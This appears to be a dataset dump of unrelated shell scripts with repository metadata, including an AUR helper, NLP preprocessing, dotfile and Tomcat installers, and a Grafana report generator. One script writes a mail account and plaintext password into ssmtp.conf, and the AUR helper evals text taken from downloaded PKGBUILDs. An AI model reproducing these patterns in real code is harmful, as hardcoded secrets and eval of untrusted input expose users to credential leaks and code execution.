	if [[ -r "$BUILDDIR/$pkg/PKGBUILD" ]] && cd "$BUILDDIR/$pkg"; then
		# Let the user inspect the PKGBUILD; on decline, discard the checkout.
		view "$BUILDDIR/$pkg/PKGBUILD" || yesno "Continue building $pkg" || { rm -rf "${BUILDDIR:?}/$pkg"; return 1;}
		buildp "$BUILDDIR/$pkg/PKGBUILD" || return 1
	else
		die "$BUILDDIR/$pkg does not contain a PKGBUILD or it is not readable"
	fi
	return 0
}
view()
{ # view PKGBUILD.. usage: view "/path/to/PKGBUILD"
  # Returns 1 after the user viewed/edited the file (caller re-confirms),
  # 0 when viewing was skipped (NOVIEW set, or the user declined).
  # NOTE(review): relies on $pkg leaking in from the caller's scope, and
  # passes a second argument to yesno that yesno never reads -- confirm
  # whether that "1" was meant to flip the default answer.
	[[ -z $NOVIEW ]] && yesno "View/Edit the PKGBUILD for $pkg" 1 && { ${EDITOR:-vi} "$1"; return 1; }
	return 0
}
keys()
{ # import PGP keys from package.. usage: keys ${KEYS[@]}
  # For each key not already known to pacman-key, try to receive it with
  # gpg and sign it locally; failures are reported but not fatal.
	for key; do
		if ! pacman-key --list-keys | grep -q "$key"; then
			msg '\e[33m' "Resolving missing pgp key for $pkg: $key"
			# NOTE(review): `!` binds only to the gpg call here, so the
			# condition is (gpg failed) AND both pacman-key calls succeeded --
			# likely intended as `! { gpg ... && ... && ...; }`. Confirm.
			if ! gpg --receive-keys "$key" && sudo pacman-key -r "$key" && sudo pacman-key --lsign-key "$key"; then
				msg '\e[33m' "Failed to import pgp key, continuing anyway"
			fi
		fi
	done
}
deps()
{ # build package depends.. usage: deps ${DEPENDS[@]}
  # For each dependency: strip any version constraint (>=1.2 etc.), and if
  # it is neither installed (-Qsq) nor in the repos (-Ssq), build it from
  # the AUR recursively via get. Finally return to the caller's build dir
  # (get/cd may have moved us; $pkg leaks in from the caller's scope).
	for dep; do
		dep="$(sed 's/[=<>]=\?[0-9.\-]*.*//g' <<< "$dep")"
		if ! { pacman -Qsq "^$dep$" || pacman -Ssq "^$dep$"; } >/dev/null 2>&1; then
			msg '\e[33m' "Resolving \e[32m$pkg\e[0m\e[1m AUR dependency: $dep"
			get "$dep" || die "failed to build dependency $dep"
		fi
	done
	cd "$BUILDDIR/$pkg" || die "failed to cd $BUILDDIR/$pkg"
}
yesno()
{ # usage: yesno "question" -- prompt for confirmation; an empty reply,
  # 'y' or 'Y' counts as yes. Always yes (no prompt) when NOCONF is set.
	if [[ $NOCONF ]]; then
		return 0
	fi
	read -re -p $'\e[34m::\e[0m \e[1m'"$1"$'? [Y/n]\e[0m ' c
	case "$c" in
		''|y|Y) return 0 ;;
		*) return 1 ;;
	esac
}
query()
{ # return key value $1 from json/dict $2, usage: query "key" "input"
	# specifically for the response given when querying the AUR for a search
	# awk splits the record on "," boundaries and prints the field whose
	# text matches the key; sed then strips the key prefix, trailing
	# quote/comma, backslashes and percent signs, and normalizes null.
	awk -F'","' -v k="$1" '{ for (i=1; i <= NF; i++) { if ($i ~ k) print $i } }' <<< "$2" |
	sed 's/.*'"$1"'":"\?\(.*\),\?"\?.*/\1/g; s/[,"]$//g; s/[\\%]//g; s/null,".*$/null/'
}
buildp()
{ # build package.. usage: buildp "/path/to/PKGBUILD"
	# this function assumes that we're in the directory containing the PKGBUILD
	# Scans the PKGBUILD line-by-line for the depends/makedepends/
	# validpgpkeys arrays, evals only that text, resolves keys and
	# dependencies, then builds and installs with makepkg.
	typeset -i in out # in or out of array
	typeset -a depends makedepends validpgpkeys # arrays
	typeset arrtext=""
	# read the PKGBUILD and grab the depends, makedepends, and validpgpkeys
	while read -r line; do
		[[ $line =~ ^[\ \ ]*# ]] && continue # skip comments
		# determine if were in and/or out an array (including single line arrays)
		case "$line" in
			depends=*|makedepends=*|validpgpkeys=*)
				in=1
				[[ $line == *')'* ]] && out=1 # account for just a single line array
				;;
			*')'*)
				(( in )) && out=1
				;;
		esac
		# if were in an array add/start the string
		(( in )) && { [[ $arrtext ]] && arrtext+=$'\n'"$line" || arrtext="$line"; }
		# if were now out of an array, reset both
		(( out )) && out=0 in=0
	done < "$1"
	# better than evaluating the whole PKGBUILD but still sub-optimal, ideally
	# we get the 3 arrays filled with values we need to build the package
	eval "$arrtext"
	# keys (if any)
	(( ${#validpgpkeys[@]} > 0 )) && keys "${validpgpkeys[@]}"
	# dependencies
	(( ${#depends[@]} || ${#makedepends[@]} )) && deps "${depends[@]}" "${makedepends[@]}"
	# build and install it, upon success remove it
	makepkg -sicr && { rm -rf ./*.tar.xz >/dev/null 2>&1 || return 0; }
}
search()
{ # search query the AUR, usage: search "query"
  # Queries the AUR RPC for each argument, prints a numbered result list,
  # then reads a selection of numbers and installs the chosen packages.
	for q; do
		msg '\e[34m' "Searching the AUR for '$q'...\n"
		typeset res="$(curl -Lsm 10 "$AUR"'/rpc.php?type=search&arg='"$q")"
		if [[ -z $res || $res == *'"resultcount":0'* ]]; then
			printf "\e[1;31m:: \e[0mno results found\n"
		else
			typeset -i i=1
			typeset -a pkgs=()
			# One JSON object per line; pull out name/version/description.
			while read -r key; do
				n=$(query "Name" "$key")
				v=$(query "Version" "$key")
				d=$(query "Description" "$key")
				# Wrap long descriptions at sentence punctuation.
				(( ${#d} > ${COLUMNS:-$(tput cols)} )) && d=$(sed 's/\([\.,]\)/\1\\n /' <<< "$d")
				[[ $(query "OutOfDate" "$key") != null ]] && v+="\e[1;31m (Out of Date!)"
				printf "\e[1;33m%s\e[1;35m AUR/\e[1;37m%s \e[1;32m$v\n\e[0m $d\n" "$i" "$n"
				(( i++ ))
				pkgs+=("${n//[()]/}")
			done < <(sed 's/},{/\n/g' <<< "$res")
			# Ask which results to install; non-numeric tokens are ignored.
			if (( i > 1 )) && read -re -p $'\n\nEnter package number(s) to install: ' id && [[ $id =~ [0-9] ]]; then
				for num in $id; do
					case $num in
						''|*[!0-9]*) : ;;
						*) AURPKGS+=("${pkgs[$((num - 1))]}") ;;
					esac
				done
				(( ! ${#AURPKGS[@]} )) || installp
			fi
		fi
	done
}
update()
{ # check updates for each package
  # With no explicit package list, collect all foreign (AUR) packages and,
  # unless --auronly, also run a full pacman system upgrade first. Then
  # scrape each package's AUR page for the latest version, compare with
  # vercmp, and rebuild anything out of date. Always exits the script.
	if (( ! ${#AURPKGS[@]} )); then
		mapfile -t AURPKGS < <(pacman -Qqm 2>/dev/null)
		[[ $AURONLY ]] || sudo pacman -Syyu $NOCONF
	fi
	if (( ${#AURPKGS[@]} )); then
		msg '\e[34m' "Synchronizing AUR package versions..."
		typeset -a needsupdate=() newv=() oldv=() latestver=()
		typeset installed="${AURPKGS[*]}"
		typeset -i i
		# Fetch all package pages in one curl via brace expansion, and pull
		# the version out of the "Details:" heading.
		mapfile -t newv < <(curl -#L "$AUR/packages/{${installed// /,}}" | awk '/Details:/ {sub(/<\/h.?>/,""); print $4}')
		mapfile -t oldv < <(pacman -Q "${AURPKGS[@]}" | awk '{print $2}')
		for ((i=0; i < ${#AURPKGS[@]}; i++)); do
			# vercmp < 0 means the installed version is older than the AUR's.
			if [[ ${newv[$i]} && ${oldv[$i]} && $(vercmp "${oldv[$i]}" "${newv[$i]}") -lt 0 ]]; then
				needsupdate+=("${AURPKGS[$i]}")
				latestver+=("${newv[$i]}")
				printf " %s \e[1m\e[31m%s \e[33m->\e[32m %s\e[0m\n" "${AURPKGS[$i]}" "${oldv[$i]}" "${newv[$i]}"
			fi
		done
		msg '\e[34m' "Starting AUR package upgrade..."
		if (( ${#needsupdate[@]} > 0 )); then
			printf "\n\e[1mPackages (%s)\e[0m %s\n\n" "${#needsupdate[@]}" "${needsupdate[*]}"
			for ((i=0; i < ${#needsupdate[@]}; i++)); do printf "%s" "${needsupdate[$i]}-${latestver[$i]}"; done
			yesno "Proceed with package upgrade" && for pkg in "${needsupdate[@]}"; do get "$pkg"; done
		else
			msg '' " there is nothing to do"
		fi
	else
		msg '\e[34m' "No AUR packages installed.."
	fi
	exit 0
}
installp()
{ # loop over package array and install each
  # Repo packages (PACPKGS) go through pacman in one shot (skipped with
  # --auronly); AUR packages are verified to exist (HTTP 200 on their AUR
  # page) and then built with get.
	if (( ${#AURPKGS[@]} || ${#PACPKGS[@]} )); then
		# NOTE(review): AURONLY holds the string "--auronly" when set; using
		# it inside (( )) relies on arithmetic evaluation of that string --
		# confirm this behaves as intended when the flag is given.
		(( ! AURONLY && ${#PACPKGS[@]} )) && { sudo pacman -S --noconfirm "${PACPKGS[@]}" $NOCONF || exit 1; }
		for pkg in "${AURPKGS[@]}"; do
			if (( $(curl -sLI -m 10 "$AUR/packages/$pkg" | awk 'NR==1 {print $2}') == 200 )); then
				get "$pkg" || msg '\e[33m' "Exited $pkg build early"
			else
				# NOTE(review): $v is not set in this function (it leaks from
				# search); the message likely meant to show the HTTP status.
				die "$v response from $AUR/packages/$pkg"$'\n\ncheck the package name is spelled correctly'
			fi
		done
	else
		die "no targets specified"
	fi
}
trap 'echo; exit' SIGINT # catch ^C
# Entry point: sanity checks, long-option -> short-option translation,
# getopts parsing, then dispatch to the operation stored in $RUN
# (search/update/installp, set via the OPTS table).
if (( ! UID )); then
	die "do not run baph as root"
elif (( ! $# )); then
	die "no operation specified (use -h for help)"
elif ! hash sudo curl >/dev/null 2>&1; then
	die "this requires to following packages: sudo, curl\n\n\toptional packages: git"
else
	RUN='' ARGS=''
	for arg; do # shift long opts to short form
		case "$arg" in
			--version|--help|--search|--install|--update|--noview|--auronly|--noconfirm)
				# --noconfirm maps to the capital -N (uppercased), all other
				# long options map to the first letter after the dashes;
				# duplicates are dropped.
				[[ $arg == '--noconfirm' ]] && arg="${arg^^}"
				[[ $ARGS == *"${arg:2:1}"* ]] || ARGS+="${arg:1:2}" ;;
			--*) die "invalid option: '$arg'" ;;
			-*) [[ $ARGS == *"${arg:1:1}"* ]] || ARGS+="$arg " ;;
			*) [[ $ARGS == *"$arg"* ]] || ARGS+="$arg " ;;
		esac
	done
	# Re-set the positional parameters to the normalized argument string.
	eval set -- "$ARGS"
	while getopts ":hvuisanN" OPT; do
		case "$OPT" in
			h|v) use "-$OPT" ;;
			n|N|a|s|u|i)
				# s/u/i are mutually exclusive operations; the OPTS table maps
				# each flag to a variable assignment that is eval'd here.
				[[ $OPT =~ (s|u|i) && $RUN ]] && die "${DESC[$OPT]} and $RUN cannot be used together"
				eval "${OPTS[$OPT]}" ;;
			\?) die "invalid option: '$OPTARG'" ;;
		esac
	done
	shift $((OPTIND - 1))
	if [[ $RUN == 'search' ]]; then
		(( $# > 0 )) || die "search requires a query"
		$RUN "$@"
	else
		# Split remaining names into repo packages vs AUR packages.
		for arg; do
			pacman -Ssq "^$arg$" >/dev/null 2>&1 && PACPKGS+=("$arg") || AURPKGS+=("$arg")
		done
		$RUN
	fi
fi
# vim:fdm=marker:fmr={,}
| true
|
88211a70a0a9e4a1f630044e031456fb29e4117d
|
Shell
|
RailsonPFrazao/lista11
|
/questao1.sh
|
UTF-8
| 476
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash
# Remove a class of characters from a user-chosen file:
#   a - letters, b - digits, c - punctuation.
# -r stops read from mangling backslashes in the typed filename.
read -r -p "Escolha o arquivo a ser alterado:" arq
read -r -p "Escolha entre as opções a- remove todas as letras do arquivo, b- remove todos os digitos do arquivo, c- remove todos os carcteres que não são nem letras nem dígitos de um arquivo:" op
# Bug fix: the original wrote the result back with an unquoted `echo $val`,
# which word-splits the content and collapses the whole file onto a single
# line. printf '%s\n' "$val" keeps the line structure sed produced, and
# quoting "$arq" supports filenames with spaces.
[ "$op" = "a" ] && val=$(sed 's/[a-zA-Z]//g' "$arq") && printf '%s\n' "$val" > "$arq"
[ "$op" = "b" ] && val=$(sed 's/[0-9]//g' "$arq") && printf '%s\n' "$val" > "$arq"
[ "$op" = "c" ] && val=$(sed 's/[[:punct:]]//g' "$arq") && printf '%s\n' "$val" > "$arq"
| true
|
561bf767d017c971daa251fed4bbdd0025f08142
|
Shell
|
vaishnavisirsat/Day5
|
/Arithmetic.sh
|
UTF-8
| 327
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# Read three numbers and print a few mixed arithmetic expressions,
# illustrating operator precedence inside $(( )).
# (Debug -x tracing removed from the shebang; it was a leftover.)
read -r -p "Enter first number : " a
read -r -p "Enter second number : " b
read -r -p "Enter third number : " c
result=$(($a+$b*$c))
echo "a + b * c :$result"
result=$(($c + $a / $b))
echo "c + a / b : $result"
result=$(($a % $b + $c))
echo "a % b + c : $result"
result=$(($a * $b + $c))
# Bug fix: this expression computes a*b+c, but the original label
# wrongly said "a + b + c".
echo "a * b + c : $result"
| true
|
08df237c392c42ee0be5a5d00c75175f1be6dc66
|
Shell
|
JanusL/nlp-project
|
/preprocess.sh
|
UTF-8
| 2,841
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash
# Preprocess all corpora: for each parallel en/sl pair, run cleanup.py and
# then bert_tokenize.py. Source/target halves are processed concurrently
# (backgrounded with `&`) and joined with `wait` before the next stage.
echo "Tokenizing testset...."
python scripts/cleanup.py --input data/nlp/asistent_testset.en --output data/nlp/src-test-clean.txt & \
python scripts/cleanup.py --input data/nlp/asistent_testset.sl --output data/nlp/tgt-test-clean.txt
python scripts/bert_tokenize.py --input data/nlp/src-test-clean.txt --output data/nlp/src-test-token.txt & \
python scripts/bert_tokenize.py --input data/nlp/tgt-test-clean.txt --output data/nlp/tgt-test-token.txt
wait
echo "Tokenizing TC3... It has more than 24 000 000 lines, so this will take about 2 hours..."
python scripts/cleanup.py --input data/nlp/TC3.en --output data/nlp/src-clean.txt & \
python scripts/cleanup.py --input data/nlp/TC3.sl --output data/nlp/tgt-clean.txt
python scripts/bert_tokenize.py --input data/nlp/src-clean.txt --output data/nlp/src-token.txt & \
python scripts/bert_tokenize.py --input data/nlp/tgt-clean.txt --output data/nlp/tgt-token.txt
wait
# The corpora below follow the same layout: data/<name>/{src,tgt}-raw.txt.
declare -a arr=("random" "spook" "trans" "wikimedia" "wikipedia")
for i in "${arr[@]}"
do
    echo "Tokenizing $i...."
    python scripts/cleanup.py --input data/$i/src-raw.txt --output data/$i/src-clean.txt & \
    python scripts/cleanup.py --input data/$i/tgt-raw.txt --output data/$i/tgt-clean.txt
    python scripts/bert_tokenize.py --input data/$i/src-clean.txt --output data/$i/src-token.txt & \
    python scripts/bert_tokenize.py --input data/$i/tgt-clean.txt --output data/$i/tgt-token.txt
    wait
done
echo "Tokenizing orwel...."
python scripts/cleanup.py --input data/orwel/elan-orwl-en.txt --output data/orwel/src-clean.txt & \
python scripts/cleanup.py --input data/orwel/elan-orwl-sl.txt --output data/orwel/tgt-clean.txt
python scripts/bert_tokenize.py --input data/orwel/src-clean.txt --output data/orwel/src-token.txt & \
python scripts/bert_tokenize.py --input data/orwel/tgt-clean.txt --output data/orwel/tgt-token.txt
wait
echo "Tokenizing hp..."
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L004-en.txt --output data/spook/src-clean-hp.txt & \
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L004-sl.txt --output data/spook/tgt-clean-hp.txt
python scripts/bert_tokenize.py --input data/spook/src-clean-hp.txt --output data/spook/src-token-hp.txt & \
python scripts/bert_tokenize.py --input data/spook/tgt-clean-hp.txt --output data/spook/tgt-token-hp.txt
wait
echo "Tokenizing lotr..."
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L005-en.txt --output data/spook/src-clean-lotr.txt & \
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L005-sl.txt --output data/spook/tgt-clean-lotr.txt
python scripts/bert_tokenize.py --input data/spook/src-clean-lotr.txt --output data/spook/src-token-lotr.txt & \
python scripts/bert_tokenize.py --input data/spook/tgt-clean-lotr.txt --output data/spook/tgt-token-lotr.txt
|
99faf7ea9f6f98337097eae3956e85f205a81fae
|
Shell
|
flw-cn/shell-profiles
|
/install.sh
|
UTF-8
| 2,395
| 3.25
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# vim: set fdm=marker:
# Install the flw shell profiles: symlink dot_* files from the repo into
# $HOME, hook the bash startup files, and set up oh-my-zsh + docker config.
REPO_PATH=~/.flw-shell-profiles
REPO_NAME=$(basename $REPO_PATH)
install() {
    # Symlink repo file "dot_<name>" to "~/.<name>", replacing any old link.
    dotname=$(basename $1)
    realname=${dotname/#dot_/.}
    if [ -z "$realname" ]; then
        echo Cannot install $dotname.
        return
    fi
    echo -n Install ~/$realname...
    rm -f ~/$realname
    ln -s $REPO_NAME/$dotname ~/$realname
    echo done
}
# The dot_config scheme still has problems:
# TODO: on macOS and FreeBSD this conflicts with how other software is
# configured, especially inside an XDE
# install dot_config # prefer configuring via ~/.config/ so it is centralized
install dot_bash_profile_flw
install dot_bashrc_flw
install dot_zshrc
install dot_screenrc           # screen configuration file
install dot_tmux.conf          # configuration file for tmux and tmate
install dot_tmux-copy-mode.conf # tmux copy-mode config; kept separate since tmate does not support it
install dot_fzf.zsh            # fzf configuration file
install dot_inputrc            # readline configuration file
install dot_gdbinit            # gdb startup script
install dot_guile              # guile startup script
install dot_sbclrc             # sbcl startup script
install dot_haskeline          # Haskell REPL config; also needs matching tweaks under tmux
install dot_racketrc           # Racket startup config
install dot_editrc             # Racket REPL config; also load xrepl in racketrc
install dot_gitconfig          # Git configuration file
install dot_gitmessage         # Git commit message template
# Install the bash startup hooks {{{
touch ~/.bash_profile
perl -i -lne 'print unless /# flw bash script begin/../# flw bash script end/' ~/.bash_profile
cat <<EOD >> ~/.bash_profile
# flw bash script begin
if [ -e ~/.bash_profile_flw ]; then
    . ~/.bash_profile_flw
fi
# flw bash script end
EOD
touch ~/.bashrc
perl -i -lne 'print unless /# flw bash script begin/../# flw bash script end/' ~/.bashrc
cat <<EOD >> ~/.bashrc
# flw bash script begin
if [ -e ~/.bashrc_flw ]; then
    . ~/.bashrc_flw
fi
# flw bash script end
EOD
# }}}
# Install oh-my-zsh and the zsh startup theme {{{
git clone https://github.com/robbyrussell/oh-my-zsh.git ~/.oh-my-zsh
ln -s $REPO_PATH/flw.zsh-theme ~/.oh-my-zsh/custom/themes/flw.zsh-theme
# }}}
# Install the docker configuration link {{{
rm -f ~/.docker
ln -s ~/.config/docker ~/.docker
# }}}
| true
|
fa088fa7307563a48b3d33e24e7454d081fa2222
|
Shell
|
esbenab/AD-Udvidelse
|
/makeGroupShares/setgroup.sh
|
UTF-8
| 3,798
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
#title :setgoup.sh
#description :Sets the group and rights for a given directory recursively
#author :Esben A Black (DKSAS30)
#date :10 juli 2015
#version :1.0
#usage :setgroup.sh groupname permission_pattern path
#==============================================================================
set -euf -o pipefail
if [ "$EUID" -ne 0 ]
then
echo "Program must be run as root"
exit 1
fi
# Print all arguments as one line on stderr.
echoerr() { printf '%s\n' "$*" 1>&2; }
# return to original dir on error exit
# Pops the directory pushed earlier in the script, then exits with the
# status given as $1.
exitError() {
    popd > /dev/null
    exit $1
}
# Make sure any temporary files are secured:
umask 0177
if [ -f $(dirname "$0")/setgroup.cfg ]
then
if [ "$(stat -c "%a %u" $(dirname "$0")/setgroup.cfg)" != "640 0" ];
then
echoerr "Config file $(dirname "$0")/setgroup.cfg must be owned by root at have permissions: 640"
echoerr "Make sure the file conforms to the description in the header."
exit 1
fi;
source "$(dirname "$0")/setgroup.cfg";
else
echoerr "Config file $(dirname "$0")/setgroup.cfg must exist and be owned by root, having permissions 640"
exit 1
fi;
# Print the command synopsis and option help on stdout.
function usage(){
    printf "Usage: %s: [-R] -g groupname [-g groupname] -p pattern path\n" "$(basename $0)"
    echo "-R recursively: apply the changes"
    echo "-g groupname: list the groups that should have the pattern described"
}
# Report a missing option argument ($@ names the option), show usage,
# and abort with status 2 via exitError.
function argumenterror(){
    # Bug fix: the original echoed "...option\n $use" -- a literal "\n"
    # (plain echo does not expand escapes) followed by an undefined $use
    # variable. Print just the message; usage is shown right after anyway.
    echo "Argument missing from -$@ option"
    usage
    exitError 2
}
#set flags
mandetorygroup=false
mandetorypattern=false
recursive=
groupnames=
while getopts ":Rg:p:h" opt; do
case "$opt" in
# First we need to check if the settings should be applied recursively
R)
recursive=-R
;;
# we need to assign groups to the groupnames variable
g)
mandetorygroup=true
if [[ $OPTARG != -* ]]
then
if [ -n "$groupnames" ]
then
groupnames="$groupnames $OPTARG"
else
groupnames=$OPTARG
fi
else
argumenterror $opt
fi
;;
# we need a permission pattern to apply
p)
if [[ "$OPTARG" != -* ]] && [[ ${OPTARG} =~ [\-0-7r][\-0-7w][\-0-7x].* ]]
then
mandetorypattern=true
pattern=$OPTARG
else
if [[ ${OPTARG} =~ [\-0-7r][\-0-7w][\-0-7x].* ]]
then
echoerr 'permission patern must match "[r-][w-][x-]" example: r-x or rw-'
usage
exitError 1
fi
argumenterror $opt
fi
;;
# woops here we catch missing arguments
\:) argumenterror $OPTARG
;;
# print help
h)
usage
;;
# say what ? the options was not understood
\?)
echoerr "Invalid option: -$OPTARG"
usage
;;
esac
done
echo $@
shift $(($OPTIND - 1))
echo $@
path="$*"
pushd $path > /dev/null
# we make sure that the mandetory options are set
if ! "$mandetorygroup" || ! "$mandetorypattern" || ! [ -d "$path" ]
then
if ! $mandetorygroup
then
echoerr "At least one group name must be given"
fi
if ! $mandetorypattern
then
echoerr "Exactly one permission pattern must be provided"
fi
if ! [ -d "$path" ] || [[ "$path" == '/' ]]
then
echoerr "A valid path must be given af the last argument"
fi
usage
exitError 1
fi
if [[ "$path" == '/' ]]
then
echoerr "'/' is not a valid path! do you want to destroy your system?"
exitError 1
fi
# Set the gihts for on the folders.
chmod $recursive g=rwx,o-rwx "$path"
for batchUser in $BATCHUSERS
do
setfacl $recursive -d -m u:$batchUser:r-x "$path"
setfacl $recursive -m u:$batchUser:r-x "$path"
done
setfacl $recursive -d -m g:sas:r-x "$path"
setfacl $recursive -m g:sas:r-x "$path"
for group in $groupnames;
do
# echo $group $path $pattern $recursive
setfacl $recursive -d -m g:$group:$pattern "$path"
if [ "$?" != 0 ]
then
echo "The error is most likely in the groupname."
echo "Failing: setfacl $recursive -d -s g:$group:$pattern \"$path\""
exitError 1
fi
setfacl $recursive -m g:$group:$pattern "$path"
done
popd > /dev/null
| true
|
fa5738f77b10cecf1e0de778dc651af5f6b26c1f
|
Shell
|
xxhank/ApplicationSupport
|
/install
|
UTF-8
| 674
| 3.65625
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
# Symlink bundled configuration folders from this repo into the user's
# Library/Preferences directories (macOS layout).
# NOTE(review): the shebang says sh but the script uses `function` and
# `[[ ]]` (bashisms) -- confirm it is actually run under bash.
function pause(){
    # Wait for the user to press Enter, showing all args as the prompt.
    read -p "$*"
}
CURRENT=`dirname $0`
function link_to_home(){
    # Link "$CURRENT/$1" into "$HOME/$2", skipping if the target exists.
    NAME="$1"
    SOURCE="$CURRENT/$NAME"
    TARGET="$HOME/$2"
    if [[ -e "$SOURCE" ]]; then
        if [[ -e "$TARGET/$NAME" ]]; then
            echo "\"$TARGET/$NAME\" aleady exist"
        else
            echo "\"$SOURCE\" -> \"$TARGET\""
            ln -s "$SOURCE" "$TARGET"
        fi
    else
        echo "$SOURCE not exist, please check"
    fi
}
link_to_home "Sublime Text 3" "Library/Application Support"
link_to_home "Eudb_en" "Library"
link_to_home "WebStorm2016.1" "Preferences"
pause 'Press [Enter] key to continue...'
| true
|
d61f9cdb6d37f869ab857fbba0d144fac2e93971
|
Shell
|
PoplarYang/bash
|
/bash/tomcat_lite.sh
|
UTF-8
| 443
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# SysV init wrapper for Tomcat: delegates start/stop to the bundled
# startup.sh/shutdown.sh scripts.
. /etc/init.d/functions
# chkconfig: - 85 15
# description: Tomcat
# Tomcat installation directory
export CATALINA_HOME="/usr/local/tomcat"
case "$1" in
    start)
        # Only attempt to start when the launcher script is present.
        if [ -f $CATALINA_HOME/bin/startup.sh ];then
            echo $"Start Tomcat"
            $CATALINA_HOME/bin/startup.sh
        fi
        ;;
    stop)
        if [ -f $CATALINA_HOME/bin/shutdown.sh ];then
            echo $"Stop Tomcat"
            $CATALINA_HOME/bin/shutdown.sh
        fi
        ;;
    *)
        echo $"Usage: $0 {start|stop}"
        exit 1
        ;;
esac
| true
|
f5f723a00612f958d6a40258a728d89e184f542b
|
Shell
|
pushaas/pushaas-demo
|
/03-app-log.sh
|
UTF-8
| 562
| 3.078125
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Demo step 03: show the tsuru application's recent logs to the user.
# Relies on helpers (printScriptPart, printItem, appName, ...) defined
# in .utils.sh.
##################
# before
##################
. .utils.sh
printScriptPart
printItem "show your application logs"
printSubitem "errors are expected and will be solved when you create and bind a Push Service instance to your app"
waitEnter
##################
# do
##################
set -e
APP_NAME=$(appName)
# Pull the last 1000 log lines and keep only the 8 most recent
# checkEnv/checkServices entries.
tsuru app-log -a $APP_NAME -l 1000 | grep "checkEnv\|checkServices" | tail -n 8
##################
# after
##################
printUserPart
printItem "read the logs above (knowing that the errors are expected)"
printUserPartContinue
echo
| true
|
31d2dec197fe712fe08b1b7b4165223a6fee189d
|
Shell
|
lschellenberg/parityscripts
|
/pService.sh
|
UTF-8
| 286
| 3.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# pService.sh - thin wrapper around systemctl for the parity service.
# Usage: pService.sh {start|reload|stop|status}
if [ $# -eq 0 ]
then
    echo "No arguments supplied"
    exit 1
fi
case "$1" in
    "start" ) sudo systemctl start parity;;
    "reload" ) sudo systemctl daemon-reload;;
    "stop" ) sudo systemctl stop parity;;
    "status" ) sudo systemctl status parity.service;;
    # Robustness: reject unknown actions instead of silently doing nothing.
    * )
        echo "Unknown action: $1" >&2
        exit 1;;
esac
| true
|
b2b5ebecb36567bc5aabb34d3e993fc8ae605d01
|
Shell
|
harshahota/autotest
|
/pass.sh
|
UTF-8
| 455
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
# pass.sh - mail a "tests passed" report (with zipped HTML report) to $1.
echo "......................................"
echo ".........the pass message............"
echo ".........the pass mail $1............"
echo "......................................"
# Bug fix: plain `echo` does not expand \n, so the original appended the
# whole ssmtp configuration to the file as ONE line of literal "\n"
# sequences. printf emits real newlines, one directive per line.
# NOTE(review): credentials are hardcoded here and re-appended on every
# run; move them to a secret store and write the file idempotently.
printf '%s\n' \
    "root=harshahota@gmail.com" \
    "mailhub=smtp.gmail.com:587" \
    "AuthUser=jenkinsupdates@gmail.com" \
    "AuthPass=jenkinspassword" \
    "UseTLS=YES" \
    "UseSTARTTLS=YES" \
    "FromLineOverride=YES" >> /etc/ssmtp/ssmtp.conf
zip -r report.zip target/report
echo "Test cases Passed" | mail -s "Pass Report" "$1" -A report.zip
| true
|
a273cd004b0369302b22ff8dc04726d5a86f4ac5
|
Shell
|
paliwalvimal/sensu-grafana
|
/pdf-report-generator.sh
|
UTF-8
| 1,297
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
# Generate PDF reports for Grafana dashboards via the reporter service on
# port 8686. Prompts for an API key, the Grafana host, and either one
# dashboard UID or "A" for all dashboards.
read -p "API Key: " API_KEY
read -p "Grafana Server [localhost]: " GRAFANA_SERVER
read -p "Dashboard ID (A - for all): " D_UID
if [[ -z ${D_UID} ]]; then echo "Required either Dashboard ID or A"; exit 1; fi
# declare -l lower-cases the value, so the default applies case-insensitively.
declare -l GRAFANA_ADDR=${GRAFANA_SERVER}
if [[ -z ${GRAFANA_ADDR} ]]; then GRAFANA_ADDR="localhost"; fi
# NOTE(review): the API token is passed on curl command lines / URLs, so it
# is visible in the process list -- consider a header from a file instead.
if [[ ${D_UID} == 'a' || ${D_UID} == 'A' ]]; then
    # All dashboards: write the PDFs into a timestamped folder in $HOME.
    D_FOLDER=$(date +%F_%T)
    mkdir ~/${D_FOLDER}
    D_FOLDER=~/${D_FOLDER}
    # base64-encode each search result so a whole JSON object survives the
    # for-loop word splitting; decode per item with jq.
    DASHBOARD_LIST=$(curl -s -H "Authorization: Bearer ${API_KEY}" ${GRAFANA_ADDR}:3000/api/search?type=dash-db | jq -r '.[] | @base64')
    for DASHBOARD in $DASHBOARD_LIST
    do
        D_UID=$(echo ${DASHBOARD} | base64 --decode | jq -r '.uid')
        D_TITLE=$(echo ${DASHBOARD} | base64 --decode | jq -r '.title')
        echo "Generating report for ${D_TITLE}..."
        curl -s -o "${D_FOLDER}/${D_TITLE}.pdf" http://${GRAFANA_ADDR}:8686/api/v5/report/${D_UID}?apitoken=${API_KEY}
        sleep 5s
    done
else
    # Single dashboard: resolve its title, save the PDF in $HOME.
    D_TITLE=$(curl -s -H "Authorization: Bearer ${API_KEY}" ${GRAFANA_ADDR}:3000/api/dashboards/uid/${D_UID} | jq -r '.dashboard.title')
    D_FOLDER=~
    echo "Generating report for ${D_TITLE}..."
    curl -s -o "${D_FOLDER}/${D_TITLE}.pdf" http://${GRAFANA_ADDR}:8686/api/v5/report/${D_UID}?apitoken=${API_KEY}
fi
| true
|
6f1b262ed696ee5624099ee347f4cc2e82ac67d1
|
Shell
|
rickknowles-cognitant/search-bert
|
/launch.sh
|
UTF-8
| 358
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/sh
# Container entrypoint: optionally clone a config repo into /sandbox,
# then start the gunicorn application server.
echo "Waiting 3 seconds for deployer interrupt ..."
sleep 3
echo "Looking for CONFIG_URL to download the config"
# Fix: quote the variable and use ${VAR:-} so an unset or spacey
# CONFIG_URL cannot break the test expression.
if [ -n "${CONFIG_URL:-}" ]
then
    echo "Found config url and downloading to sandbox"
    mkdir -p /sandbox
    git clone "$CONFIG_URL" /sandbox
else
    echo "No config url supplied"
fi
